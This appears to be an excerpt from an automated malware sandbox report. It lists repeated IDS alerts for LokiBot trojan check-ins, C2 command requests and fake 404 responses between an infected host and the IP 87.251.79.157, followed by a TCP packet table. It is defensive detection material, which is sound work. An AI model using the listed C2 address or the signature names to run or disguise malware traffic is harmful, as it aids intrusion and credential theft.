                                              03/15/21-20:02:19.191851TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979180192.168.2.587.251.79.157
                                              03/15/21-20:02:19.191851TCP2025381ET TROJAN LokiBot Checkin4979180192.168.2.587.251.79.157
                                              03/15/21-20:02:19.191851TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979180192.168.2.587.251.79.157
                                              03/15/21-20:02:19.893290TCP2025483ET TROJAN LokiBot Fake 404 Response804979187.251.79.157192.168.2.5
                                              03/15/21-20:02:20.132315TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979280192.168.2.587.251.79.157
                                              03/15/21-20:02:20.132315TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979280192.168.2.587.251.79.157
                                              03/15/21-20:02:20.132315TCP2025381ET TROJAN LokiBot Checkin4979280192.168.2.587.251.79.157
                                              03/15/21-20:02:20.132315TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979280192.168.2.587.251.79.157
                                              03/15/21-20:02:20.545478TCP2025483ET TROJAN LokiBot Fake 404 Response804979287.251.79.157192.168.2.5
                                              03/15/21-20:02:20.811216TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979380192.168.2.587.251.79.157
                                              03/15/21-20:02:20.811216TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979380192.168.2.587.251.79.157
                                              03/15/21-20:02:20.811216TCP2025381ET TROJAN LokiBot Checkin4979380192.168.2.587.251.79.157
                                              03/15/21-20:02:20.811216TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979380192.168.2.587.251.79.157
                                              03/15/21-20:02:22.134079TCP2025483ET TROJAN LokiBot Fake 404 Response804979387.251.79.157192.168.2.5
                                              03/15/21-20:02:22.370386TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979480192.168.2.587.251.79.157
                                              03/15/21-20:02:22.370386TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979480192.168.2.587.251.79.157
                                              03/15/21-20:02:22.370386TCP2025381ET TROJAN LokiBot Checkin4979480192.168.2.587.251.79.157
                                              03/15/21-20:02:22.370386TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979480192.168.2.587.251.79.157
                                              03/15/21-20:02:23.137267TCP2025483ET TROJAN LokiBot Fake 404 Response804979487.251.79.157192.168.2.5
                                              03/15/21-20:02:23.393004TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979580192.168.2.587.251.79.157
                                              03/15/21-20:02:23.393004TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979580192.168.2.587.251.79.157
                                              03/15/21-20:02:23.393004TCP2025381ET TROJAN LokiBot Checkin4979580192.168.2.587.251.79.157
                                              03/15/21-20:02:23.393004TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979580192.168.2.587.251.79.157
                                              03/15/21-20:02:23.720448TCP2025483ET TROJAN LokiBot Fake 404 Response804979587.251.79.157192.168.2.5
                                              03/15/21-20:02:23.957920TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979680192.168.2.587.251.79.157
                                              03/15/21-20:02:23.957920TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979680192.168.2.587.251.79.157
                                              03/15/21-20:02:23.957920TCP2025381ET TROJAN LokiBot Checkin4979680192.168.2.587.251.79.157
                                              03/15/21-20:02:23.957920TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979680192.168.2.587.251.79.157
                                              03/15/21-20:02:24.202555TCP2025483ET TROJAN LokiBot Fake 404 Response804979687.251.79.157192.168.2.5
                                              03/15/21-20:02:24.445594TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979780192.168.2.587.251.79.157
                                              03/15/21-20:02:24.445594TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979780192.168.2.587.251.79.157
                                              03/15/21-20:02:24.445594TCP2025381ET TROJAN LokiBot Checkin4979780192.168.2.587.251.79.157
                                              03/15/21-20:02:24.445594TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979780192.168.2.587.251.79.157
                                              03/15/21-20:02:24.836480TCP2025483ET TROJAN LokiBot Fake 404 Response804979787.251.79.157192.168.2.5
                                              03/15/21-20:02:25.081005TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979880192.168.2.587.251.79.157
                                              03/15/21-20:02:25.081005TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979880192.168.2.587.251.79.157
                                              03/15/21-20:02:25.081005TCP2025381ET TROJAN LokiBot Checkin4979880192.168.2.587.251.79.157
                                              03/15/21-20:02:25.081005TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979880192.168.2.587.251.79.157
                                              03/15/21-20:02:25.327432TCP2025483ET TROJAN LokiBot Fake 404 Response804979887.251.79.157192.168.2.5
                                              03/15/21-20:02:25.684655TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979980192.168.2.587.251.79.157
                                              03/15/21-20:02:25.684655TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979980192.168.2.587.251.79.157
                                              03/15/21-20:02:25.684655TCP2025381ET TROJAN LokiBot Checkin4979980192.168.2.587.251.79.157
                                              03/15/21-20:02:25.684655TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979980192.168.2.587.251.79.157
                                              03/15/21-20:02:26.359699TCP2025483ET TROJAN LokiBot Fake 404 Response804979987.251.79.157192.168.2.5
                                              03/15/21-20:02:26.955493TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980080192.168.2.587.251.79.157
                                              03/15/21-20:02:26.955493TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980080192.168.2.587.251.79.157
                                              03/15/21-20:02:26.955493TCP2025381ET TROJAN LokiBot Checkin4980080192.168.2.587.251.79.157
                                              03/15/21-20:02:26.955493TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980080192.168.2.587.251.79.157
                                              03/15/21-20:02:27.225793TCP2025483ET TROJAN LokiBot Fake 404 Response804980087.251.79.157192.168.2.5
                                              03/15/21-20:02:27.917007TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980180192.168.2.587.251.79.157
                                              03/15/21-20:02:27.917007TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980180192.168.2.587.251.79.157
                                              03/15/21-20:02:27.917007TCP2025381ET TROJAN LokiBot Checkin4980180192.168.2.587.251.79.157
                                              03/15/21-20:02:27.917007TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980180192.168.2.587.251.79.157
                                              03/15/21-20:02:28.185613TCP2025483ET TROJAN LokiBot Fake 404 Response804980187.251.79.157192.168.2.5
                                              03/15/21-20:02:28.431083TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980280192.168.2.587.251.79.157
                                              03/15/21-20:02:28.431083TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980280192.168.2.587.251.79.157
                                              03/15/21-20:02:28.431083TCP2025381ET TROJAN LokiBot Checkin4980280192.168.2.587.251.79.157
                                              03/15/21-20:02:28.431083TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980280192.168.2.587.251.79.157
                                              03/15/21-20:02:29.434993TCP2025483ET TROJAN LokiBot Fake 404 Response804980287.251.79.157192.168.2.5
                                              03/15/21-20:02:29.681856TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980380192.168.2.587.251.79.157
                                              03/15/21-20:02:29.681856TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980380192.168.2.587.251.79.157
                                              03/15/21-20:02:29.681856TCP2025381ET TROJAN LokiBot Checkin4980380192.168.2.587.251.79.157
                                              03/15/21-20:02:29.681856TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980380192.168.2.587.251.79.157
                                              03/15/21-20:02:30.206663TCP2025483ET TROJAN LokiBot Fake 404 Response804980387.251.79.157192.168.2.5
                                              03/15/21-20:02:30.451493TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980480192.168.2.587.251.79.157
                                              03/15/21-20:02:30.451493TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980480192.168.2.587.251.79.157
                                              03/15/21-20:02:30.451493TCP2025381ET TROJAN LokiBot Checkin4980480192.168.2.587.251.79.157
                                              03/15/21-20:02:30.451493TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980480192.168.2.587.251.79.157
                                              03/15/21-20:02:31.207740TCP2025483ET TROJAN LokiBot Fake 404 Response804980487.251.79.157192.168.2.5
                                              03/15/21-20:02:31.449127TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980580192.168.2.587.251.79.157
                                              03/15/21-20:02:31.449127TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980580192.168.2.587.251.79.157
                                              03/15/21-20:02:31.449127TCP2025381ET TROJAN LokiBot Checkin4980580192.168.2.587.251.79.157
                                              03/15/21-20:02:31.449127TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980580192.168.2.587.251.79.157
                                              03/15/21-20:02:31.693971TCP2025483ET TROJAN LokiBot Fake 404 Response804980587.251.79.157192.168.2.5
                                              03/15/21-20:02:31.930990TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980680192.168.2.587.251.79.157
                                              03/15/21-20:02:31.930990TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980680192.168.2.587.251.79.157
                                              03/15/21-20:02:31.930990TCP2025381ET TROJAN LokiBot Checkin4980680192.168.2.587.251.79.157
                                              03/15/21-20:02:31.930990TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980680192.168.2.587.251.79.157
                                              03/15/21-20:02:32.192041TCP2025483ET TROJAN LokiBot Fake 404 Response804980687.251.79.157192.168.2.5
                                              03/15/21-20:02:32.496819TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980780192.168.2.587.251.79.157
                                              03/15/21-20:02:32.496819TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980780192.168.2.587.251.79.157
                                              03/15/21-20:02:32.496819TCP2025381ET TROJAN LokiBot Checkin4980780192.168.2.587.251.79.157
                                              03/15/21-20:02:32.496819TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980780192.168.2.587.251.79.157
                                              03/15/21-20:02:32.761122TCP2025483ET TROJAN LokiBot Fake 404 Response804980787.251.79.157192.168.2.5
                                              03/15/21-20:02:32.987341TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980880192.168.2.587.251.79.157
                                              03/15/21-20:02:32.987341TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980880192.168.2.587.251.79.157
                                              03/15/21-20:02:32.987341TCP2025381ET TROJAN LokiBot Checkin4980880192.168.2.587.251.79.157
                                              03/15/21-20:02:32.987341TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980880192.168.2.587.251.79.157
                                              03/15/21-20:02:33.390136TCP2025483ET TROJAN LokiBot Fake 404 Response804980887.251.79.157192.168.2.5
                                              03/15/21-20:02:33.631086TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980980192.168.2.587.251.79.157
                                              03/15/21-20:02:33.631086TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980980192.168.2.587.251.79.157
                                              03/15/21-20:02:33.631086TCP2025381ET TROJAN LokiBot Checkin4980980192.168.2.587.251.79.157
                                              03/15/21-20:02:33.631086TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980980192.168.2.587.251.79.157
                                              03/15/21-20:02:33.904066TCP2025483ET TROJAN LokiBot Fake 404 Response804980987.251.79.157192.168.2.5
                                              03/15/21-20:02:34.145989TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981080192.168.2.587.251.79.157
                                              03/15/21-20:02:34.145989TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981080192.168.2.587.251.79.157
                                              03/15/21-20:02:34.145989TCP2025381ET TROJAN LokiBot Checkin4981080192.168.2.587.251.79.157
                                              03/15/21-20:02:34.145989TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981080192.168.2.587.251.79.157
                                              03/15/21-20:02:34.575041TCP2025483ET TROJAN LokiBot Fake 404 Response804981087.251.79.157192.168.2.5
                                              03/15/21-20:02:34.829000TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981180192.168.2.587.251.79.157
                                              03/15/21-20:02:34.829000TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981180192.168.2.587.251.79.157
                                              03/15/21-20:02:34.829000TCP2025381ET TROJAN LokiBot Checkin4981180192.168.2.587.251.79.157
                                              03/15/21-20:02:34.829000TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981180192.168.2.587.251.79.157
                                              03/15/21-20:02:35.190508TCP2025483ET TROJAN LokiBot Fake 404 Response804981187.251.79.157192.168.2.5
                                              03/15/21-20:02:35.434683TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981280192.168.2.587.251.79.157
                                              03/15/21-20:02:35.434683TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981280192.168.2.587.251.79.157
                                              03/15/21-20:02:35.434683TCP2025381ET TROJAN LokiBot Checkin4981280192.168.2.587.251.79.157
                                              03/15/21-20:02:35.434683TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981280192.168.2.587.251.79.157
                                              03/15/21-20:02:35.715600TCP2025483ET TROJAN LokiBot Fake 404 Response804981287.251.79.157192.168.2.5
                                              03/15/21-20:02:35.964694TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981380192.168.2.587.251.79.157
                                              03/15/21-20:02:35.964694TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981380192.168.2.587.251.79.157
                                              03/15/21-20:02:35.964694TCP2025381ET TROJAN LokiBot Checkin4981380192.168.2.587.251.79.157
                                              03/15/21-20:02:35.964694TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981380192.168.2.587.251.79.157
                                              03/15/21-20:02:36.235228TCP2025483ET TROJAN LokiBot Fake 404 Response804981387.251.79.157192.168.2.5
                                              03/15/21-20:02:36.490300TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981480192.168.2.587.251.79.157
                                              03/15/21-20:02:36.490300TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981480192.168.2.587.251.79.157
                                              03/15/21-20:02:36.490300TCP2025381ET TROJAN LokiBot Checkin4981480192.168.2.587.251.79.157
                                              03/15/21-20:02:36.490300TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981480192.168.2.587.251.79.157
                                              03/15/21-20:02:36.724258TCP2025483ET TROJAN LokiBot Fake 404 Response804981487.251.79.157192.168.2.5
                                              03/15/21-20:02:36.967007TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981580192.168.2.587.251.79.157
                                              03/15/21-20:02:36.967007TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981580192.168.2.587.251.79.157
                                              03/15/21-20:02:36.967007TCP2025381ET TROJAN LokiBot Checkin4981580192.168.2.587.251.79.157
                                              03/15/21-20:02:36.967007TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981580192.168.2.587.251.79.157
                                              03/15/21-20:02:37.823558TCP2025483ET TROJAN LokiBot Fake 404 Response804981587.251.79.157192.168.2.5
                                              03/15/21-20:02:38.070057TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981680192.168.2.587.251.79.157
                                              03/15/21-20:02:38.070057TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981680192.168.2.587.251.79.157
                                              03/15/21-20:02:38.070057TCP2025381ET TROJAN LokiBot Checkin4981680192.168.2.587.251.79.157
                                              03/15/21-20:02:38.070057TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981680192.168.2.587.251.79.157
                                              03/15/21-20:02:38.331742TCP2025483ET TROJAN LokiBot Fake 404 Response804981687.251.79.157192.168.2.5
                                              03/15/21-20:02:38.572152TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981780192.168.2.587.251.79.157
                                              03/15/21-20:02:38.572152TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981780192.168.2.587.251.79.157
                                              03/15/21-20:02:38.572152TCP2025381ET TROJAN LokiBot Checkin4981780192.168.2.587.251.79.157
                                              03/15/21-20:02:38.572152TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981780192.168.2.587.251.79.157
                                              03/15/21-20:02:38.816870TCP2025483ET TROJAN LokiBot Fake 404 Response804981787.251.79.157192.168.2.5
                                              03/15/21-20:02:39.060147TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981880192.168.2.587.251.79.157
                                              03/15/21-20:02:39.060147TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981880192.168.2.587.251.79.157
                                              03/15/21-20:02:39.060147TCP2025381ET TROJAN LokiBot Checkin4981880192.168.2.587.251.79.157
                                              03/15/21-20:02:39.060147TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981880192.168.2.587.251.79.157
                                              03/15/21-20:02:39.298110TCP2025483ET TROJAN LokiBot Fake 404 Response804981887.251.79.157192.168.2.5
                                              03/15/21-20:02:39.551285TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981980192.168.2.587.251.79.157
                                              03/15/21-20:02:39.551285TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981980192.168.2.587.251.79.157
                                              03/15/21-20:02:39.551285TCP2025381ET TROJAN LokiBot Checkin4981980192.168.2.587.251.79.157
                                              03/15/21-20:02:39.551285TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981980192.168.2.587.251.79.157
                                              03/15/21-20:02:40.745247TCP2025483ET TROJAN LokiBot Fake 404 Response804981987.251.79.157192.168.2.5
                                              03/15/21-20:02:40.980813TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982080192.168.2.587.251.79.157
                                              03/15/21-20:02:40.980813TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982080192.168.2.587.251.79.157
                                              03/15/21-20:02:40.980813TCP2025381ET TROJAN LokiBot Checkin4982080192.168.2.587.251.79.157
                                              03/15/21-20:02:40.980813TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982080192.168.2.587.251.79.157
                                              03/15/21-20:02:42.875461TCP2025483ET TROJAN LokiBot Fake 404 Response804982087.251.79.157192.168.2.5
                                              03/15/21-20:02:43.130286TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982180192.168.2.587.251.79.157
                                              03/15/21-20:02:43.130286TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982180192.168.2.587.251.79.157
                                              03/15/21-20:02:43.130286TCP2025381ET TROJAN LokiBot Checkin4982180192.168.2.587.251.79.157
                                              03/15/21-20:02:43.130286TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982180192.168.2.587.251.79.157
                                              03/15/21-20:02:45.156696TCP2025483ET TROJAN LokiBot Fake 404 Response804982187.251.79.157192.168.2.5
                                              03/15/21-20:02:45.404134TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982280192.168.2.587.251.79.157
                                              03/15/21-20:02:45.404134TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982280192.168.2.587.251.79.157
                                              03/15/21-20:02:45.404134TCP2025381ET TROJAN LokiBot Checkin4982280192.168.2.587.251.79.157
                                              03/15/21-20:02:45.404134TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982280192.168.2.587.251.79.157
                                              03/15/21-20:02:50.932725TCP2025483ET TROJAN LokiBot Fake 404 Response804982287.251.79.157192.168.2.5
                                              03/15/21-20:02:51.159157TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982380192.168.2.587.251.79.157
                                              03/15/21-20:02:51.159157TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982380192.168.2.587.251.79.157
                                              03/15/21-20:02:51.159157TCP2025381ET TROJAN LokiBot Checkin4982380192.168.2.587.251.79.157
                                              03/15/21-20:02:51.159157TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982380192.168.2.587.251.79.157
                                              03/15/21-20:02:51.427690TCP2025483ET TROJAN LokiBot Fake 404 Response804982387.251.79.157192.168.2.5
                                              03/15/21-20:02:51.665948TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982480192.168.2.587.251.79.157
                                              03/15/21-20:02:51.665948TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982480192.168.2.587.251.79.157
                                              03/15/21-20:02:51.665948TCP2025381ET TROJAN LokiBot Checkin4982480192.168.2.587.251.79.157
                                              03/15/21-20:02:51.665948TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982480192.168.2.587.251.79.157
                                              03/15/21-20:02:51.919107TCP2025483ET TROJAN LokiBot Fake 404 Response804982487.251.79.157192.168.2.5
                                              03/15/21-20:02:52.168227TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982580192.168.2.587.251.79.157
                                              03/15/21-20:02:52.168227TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982580192.168.2.587.251.79.157
                                              03/15/21-20:02:52.168227TCP2025381ET TROJAN LokiBot Checkin4982580192.168.2.587.251.79.157
                                              03/15/21-20:02:52.168227TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982580192.168.2.587.251.79.157
                                              03/15/21-20:02:52.854739TCP2025483ET TROJAN LokiBot Fake 404 Response804982587.251.79.157192.168.2.5
                                              03/15/21-20:02:53.077609TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982680192.168.2.587.251.79.157
                                              03/15/21-20:02:53.077609TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982680192.168.2.587.251.79.157
                                              03/15/21-20:02:53.077609TCP2025381ET TROJAN LokiBot Checkin4982680192.168.2.587.251.79.157
                                              03/15/21-20:02:53.077609TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982680192.168.2.587.251.79.157
                                              03/15/21-20:02:53.321754TCP2025483ET TROJAN LokiBot Fake 404 Response804982687.251.79.157192.168.2.5

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Mar 15, 2021 20:00:48.721120119 CET4969180192.168.2.5172.67.197.219
                                              Mar 15, 2021 20:00:48.772358894 CET8049691172.67.197.219192.168.2.5
                                              Mar 15, 2021 20:00:48.772461891 CET4969180192.168.2.5172.67.197.219
                                              Mar 15, 2021 20:00:48.773063898 CET4969180192.168.2.5172.67.197.219
                                              Mar 15, 2021 20:00:48.824127913 CET8049691172.67.197.219192.168.2.5
                                              Mar 15, 2021 20:00:48.883388996 CET8049691172.67.197.219192.168.2.5
                                              Mar 15, 2021 20:00:48.933109999 CET4969180192.168.2.5172.67.197.219
                                              Mar 15, 2021 20:00:48.959336996 CET49692443192.168.2.5172.67.197.219
                                              Mar 15, 2021 20:00:49.010942936 CET44349692172.67.197.219192.168.2.5
                                              Mar 15, 2021 20:00:49.011024952 CET49692443192.168.2.5172.67.197.219
                                              Mar 15, 2021 20:00:49.052150965 CET49692443192.168.2.5172.67.197.219
                                              Mar 15, 2021 20:00:49.104897976 CET44349692172.67.197.219192.168.2.5
                                              Mar 15, 2021 20:00:49.109785080 CET44349692172.67.197.219192.168.2.5
                                              Mar 15, 2021 20:00:49.109810114 CET44349692172.67.197.219192.168.2.5
                                              Mar 15, 2021 20:00:49.109884977 CET49692443192.168.2.5172.67.197.219
                                              Mar 15, 2021 20:00:49.125053883 CET49692443192.168.2.5172.67.197.219
                                              Mar 15, 2021 20:00:49.177985907 CET44349692172.67.197.219192.168.2.5
                                              Mar 15, 2021 20:00:49.179949999 CET44349692172.67.197.219192.168.2.5
                                              Mar 15, 2021 20:00:49.230036974 CET49692443192.168.2.5172.67.197.219
                                              Mar 15, 2021 20:00:49.289216042 CET49692443192.168.2.5172.67.197.219
                                              Mar 15, 2021 20:00:49.340867043 CET44349692172.67.197.219192.168.2.5
                                              Mar 15, 2021 20:00:49.501302004 CET44349692172.67.197.219192.168.2.5
                                              Mar 15, 2021 20:00:49.501322985 CET44349692172.67.197.219192.168.2.5
                                              Mar 15, 2021 20:00:49.501339912 CET44349692172.67.197.219192.168.2.5
                                              Mar 15, 2021 20:00:49.501354933 CET44349692172.67.197.219192.168.2.5
                                              Mar 15, 2021 20:00:49.501368046 CET44349692172.67.197.219192.168.2.5
                                              Mar 15, 2021 20:00:49.501380920 CET44349692172.67.197.219192.168.2.5
                                              Mar 15, 2021 20:00:49.501406908 CET49692443192.168.2.5172.67.197.219
                                              Mar 15, 2021 20:00:49.501410961 CET44349692172.67.197.219192.168.2.5
                                              Mar 15, 2021 20:00:49.501422882 CET44349692172.67.197.219192.168.2.5
                                              Mar 15, 2021 20:00:49.501451015 CET49692443192.168.2.5172.67.197.219
                                              Mar 15, 2021 20:00:49.501486063 CET49692443192.168.2.5172.67.197.219
                                              Mar 15, 2021 20:00:49.501840115 CET44349692172.67.197.219192.168.2.5
                                              Mar 15, 2021 20:00:49.501859903 CET44349692172.67.197.219192.168.2.5
                                              Mar 15, 2021 20:00:49.501916885 CET49692443192.168.2.5172.67.197.219
                                              Mar 15, 2021 20:00:49.502463102 CET44349692172.67.197.219192.168.2.5
                                              Mar 15, 2021 20:00:49.502480984 CET44349692172.67.197.219192.168.2.5
                                              Mar 15, 2021 20:00:49.502571106 CET49692443192.168.2.5172.67.197.219
                                              Mar 15, 2021 20:00:49.711114883 CET44349692172.67.197.219192.168.2.5
                                              Mar 15, 2021 20:00:49.711138964 CET44349692172.67.197.219192.168.2.5
                                              Mar 15, 2021 20:00:49.711291075 CET49692443192.168.2.5172.67.197.219
                                              Mar 15, 2021 20:00:49.711304903 CET44349692172.67.197.219192.168.2.5
                                              Mar 15, 2021 20:00:49.711324930 CET44349692172.67.197.219192.168.2.5
                                              Mar 15, 2021 20:00:49.711406946 CET49692443192.168.2.5172.67.197.219
                                              Mar 15, 2021 20:00:49.711945057 CET44349692172.67.197.219192.168.2.5
                                              Mar 15, 2021 20:00:49.711985111 CET44349692172.67.197.219192.168.2.5
                                              Mar 15, 2021 20:00:49.712045908 CET49692443192.168.2.5172.67.197.219
                                              Mar 15, 2021 20:00:49.713184118 CET44349692172.67.197.219192.168.2.5
                                              Mar 15, 2021 20:00:49.713202953 CET44349692172.67.197.219192.168.2.5
                                              Mar 15, 2021 20:00:49.713274956 CET49692443192.168.2.5172.67.197.219
                                              Mar 15, 2021 20:00:49.714385033 CET44349692172.67.197.219192.168.2.5
                                              Mar 15, 2021 20:00:49.714405060 CET44349692172.67.197.219192.168.2.5
                                              Mar 15, 2021 20:00:49.714484930 CET49692443192.168.2.5172.67.197.219
                                              Mar 15, 2021 20:00:49.715632915 CET44349692172.67.197.219192.168.2.5
                                              Mar 15, 2021 20:00:49.715652943 CET44349692172.67.197.219192.168.2.5
                                              Mar 15, 2021 20:00:49.715719938 CET49692443192.168.2.5172.67.197.219
                                              Mar 15, 2021 20:00:49.716794968 CET44349692172.67.197.219192.168.2.5
                                              Mar 15, 2021 20:00:49.716821909 CET44349692172.67.197.219192.168.2.5
                                              Mar 15, 2021 20:00:49.716907024 CET49692443192.168.2.5172.67.197.219
                                              Mar 15, 2021 20:00:49.717988014 CET44349692172.67.197.219192.168.2.5
                                              Mar 15, 2021 20:00:49.718014956 CET44349692172.67.197.219192.168.2.5
                                              Mar 15, 2021 20:00:49.718077898 CET49692443192.168.2.5172.67.197.219
                                              Mar 15, 2021 20:00:49.719202042 CET44349692172.67.197.219192.168.2.5
                                              Mar 15, 2021 20:00:49.719223022 CET44349692172.67.197.219192.168.2.5
                                              Mar 15, 2021 20:00:49.719294071 CET49692443192.168.2.5172.67.197.219
                                              Mar 15, 2021 20:00:49.720401049 CET44349692172.67.197.219192.168.2.5
                                              Mar 15, 2021 20:00:49.720427036 CET44349692172.67.197.219192.168.2.5
                                              Mar 15, 2021 20:00:49.720494986 CET49692443192.168.2.5172.67.197.219
                                              Mar 15, 2021 20:00:49.721604109 CET44349692172.67.197.219192.168.2.5
                                              Mar 15, 2021 20:00:49.721622944 CET44349692172.67.197.219192.168.2.5
                                              Mar 15, 2021 20:00:49.721698046 CET49692443192.168.2.5172.67.197.219
                                              Mar 15, 2021 20:00:49.722839117 CET44349692172.67.197.219192.168.2.5
                                              Mar 15, 2021 20:00:49.722857952 CET44349692172.67.197.219192.168.2.5
                                              Mar 15, 2021 20:00:49.722933054 CET49692443192.168.2.5172.67.197.219
                                              Mar 15, 2021 20:00:49.724030018 CET44349692172.67.197.219192.168.2.5
                                              Mar 15, 2021 20:00:49.724051952 CET44349692172.67.197.219192.168.2.5
                                              Mar 15, 2021 20:00:49.724123001 CET49692443192.168.2.5172.67.197.219
                                              Mar 15, 2021 20:00:49.725243092 CET44349692172.67.197.219192.168.2.5
                                              Mar 15, 2021 20:00:49.725259066 CET44349692172.67.197.219192.168.2.5
                                              Mar 15, 2021 20:00:49.725316048 CET49692443192.168.2.5172.67.197.219
                                              Mar 15, 2021 20:00:49.726453066 CET44349692172.67.197.219192.168.2.5
                                              Mar 15, 2021 20:00:49.726480961 CET44349692172.67.197.219192.168.2.5
                                              Mar 15, 2021 20:00:49.726566076 CET49692443192.168.2.5172.67.197.219
                                              Mar 15, 2021 20:00:49.727648020 CET44349692172.67.197.219192.168.2.5
                                              Mar 15, 2021 20:00:49.727672100 CET44349692172.67.197.219192.168.2.5
                                              Mar 15, 2021 20:00:49.727732897 CET49692443192.168.2.5172.67.197.219
                                              Mar 15, 2021 20:00:49.728842974 CET44349692172.67.197.219192.168.2.5
